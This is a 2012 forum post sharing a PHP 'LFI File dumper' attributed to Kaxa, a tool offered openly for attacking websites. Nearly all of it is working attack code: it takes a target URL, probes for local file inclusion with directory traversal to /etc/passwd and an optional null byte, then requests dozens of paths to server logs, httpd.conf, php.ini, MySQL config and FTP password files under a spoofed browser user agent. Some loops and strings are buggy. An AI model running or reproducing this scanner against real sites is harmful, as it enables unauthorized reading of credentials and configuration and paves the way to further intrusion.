D4rkn3S Posted October 9, 2012 Share Posted October 9, 2012 (edited) LFI File dumper By Kaxa For LeVeL-23.Biz LFI URL: File: Access Log httpd.conf Error Log php.ini MySQL FTP Null: Yes No <?php if($_POST['lfiurl']) { print ""; $target = $_POST['lfiurl']; $type = $_POST['scantype']; $byte1 = $_POST['null']; $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1.""; $lfiaccess = array( 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."", 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."", 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."", 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."", 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."", 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."", 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."", 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."", 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."", 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."", 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."", 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."", 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."", 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."", 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."", 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."", 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."", 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."", 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."", 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."", 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."", 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."", 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1.""); $lfierror = array( 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."", 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."", 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."", 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."", 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."", 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."", 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."", 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."", 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."", 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."", 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."", 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."", 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."", 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."", 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."", 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."", 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."", 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."", 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."", 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."", 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."", 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."", 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1.""); $lficonfig = array( 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."", 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."", 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."", 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."", 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."", 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."", 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."", 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."", 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."", 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."", 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."", 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."", 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."", 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."", 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."", 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."", 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."", 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."", 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."", 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."", 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."", 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."", 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."", 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."", 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."", 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."", 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."", 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."", 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."", 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."", 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."", 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."", 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."", 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."", 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1.""); $lfiphpini = array( 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."", 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."", 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."", 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."", 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."", 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."", 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."", 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."", 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."", 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."", 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."", 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."", 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."", 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."", 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."", 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."", 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."", 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."", 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."", 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."", 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."", 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."", 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."", 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."", 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."", 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."", 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1.""); $lfimysql = array( 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."", 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."", 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."", 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."", 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."", 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."", 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."", 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."", 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."", 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1.""); $lfiftp = array( 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."", 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."", 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."", 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."", 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."", 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."", 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."", 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."", 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."", 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."", 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."", 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."", 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."", 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."", 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."", 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."", 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."", 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."", 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."", 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."", 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."", 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."", 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."", 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."", 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."", 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."", 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."", 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."", 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."", 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."", 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."", 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."", 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."", 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."", 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."", 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."", 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."", 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."", 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."", 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."", 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."", 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."", 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."", 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1.""); $x = 1; if ( $type == 1 ) { $res = FetchURL($target.$lfitest); if(preg_match("/root/i", $res)) { print " ".$target."".$lfitest.""; flush(); while($lfiaccess[$x]) { $res = FetchURL($target.$lfiaccess[$x]); if(preg_match("/-0700/i", $res)) { print " ".$target."".$lfiaccess[$x].""; } elseif(preg_match("/denied/i", $res)) { print " ".$target."".$lfiaccess[$x].""; } else { print " ".$target."".$lfiaccess[$x].""; } $x++; } } else {print " ".$target."".$lfitest."";} } if ( $type == 2 ) { $res = FetchURL($target.$lfitest); if(preg_match("/root/i", $res)) { print " ".$target."".$lfitest.""; while($lficonfig[$x]) { $res = FetchURL($target.$lficonfig[$x]); if(preg_match("/ config /i", $res)) { print " ".$target."".$lficonfig[$x].""; } if(preg_match("/denied/i", $res)) { print " ".$target."".$lficonfig[$x].""; } else { print " ".$target."".$lficonfig[$x].""; } $x++; } } else {print " ".$target."".$lfitest."";} } if ( $type == 3 ) { $res = FetchURL($target.$lfitest); if(preg_match("/root/i", $res)) { print " ".$target."".$lfitest.""; while($lficonfig[$x]) { $res = FetchURL($target.$lfierror[$x]); if(preg_match("/ error_log /i", $res)) { print " ".$target."".$lfierror[$x].""; } elseif(preg_match("/denied/i", $res)) { print " ".$target."".$lfierror[$x].""; } else { print " ".$target."".$lfierror[$x].""; } $x++; } } else {print " ".$target."".$lfitest."";} } if ( $type == 4 ) { $res = FetchURL($target.$lfitest); if(preg_match("/root/i", $res)) { print " ".$target."".$lfitest.""; while($lficonfig[$x]) { $res = FetchURL($target.$lfiphpini[$x]); if(preg_match("/ php.ini /i", $res)) { print " ".$target."".$lfiphpini[$x].""; } elseif(preg_match("/denied/i", $res)) { print " ".$target."".$lfiphpini[$x].""; } else { print " ".$target."".$lfiphpini[$x].""; } $x++; } } else {print " ".$target."".$lfitest."";} } if ( $type == 5 ) { $res = FetchURL($target.$lfitest); if(preg_match("/root/i", $res)) { print " ".$target."".$lfitest.""; while($lfimysql[$x]) { $res = FetchURL($target.$lfimysql[$x]); if(preg_match("/\[mysqld\]/i", $res)) { print " ".$target."".$lfimysql[$x].""; } elseif(preg_match("/denied/i", $res)) { print " ".$target."".$lfimysql[$x].""; } else { print " ".$target."".$lfimysql[$x].""; } $x++; } } else {print " ".$target."".$lfitest."";} } if ( $type == 6 ) { $res = FetchURL($target.$lfitest); if(preg_match("/root/i", $res)) { print " ".$target."".$lfitest.""; while($lfiftp[$x]) { $res = FetchURL($target.$lfiftp[$x]); if(preg_match("/ ftpd /i", $res)) { print " ".$target."".$lfiftp[$x].""; } elseif(preg_match("/denied/i", $res)) { print " ".$target."".$lfiftp[$x].""; } else { print " ".$target."".$lfiftp[$x].""; } $x++; } } else {print " ".$target."".$lfitest."";} } } function FetchURL($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $data = curl_exec($ch); if(!$data) { return false; } return $data; } ?> FOR L e LeVeL e L - 23 By Kaxa Edited October 9, 2012 by D4rkn3S Link to comment Share on other sites More sharing options...
Recommended Posts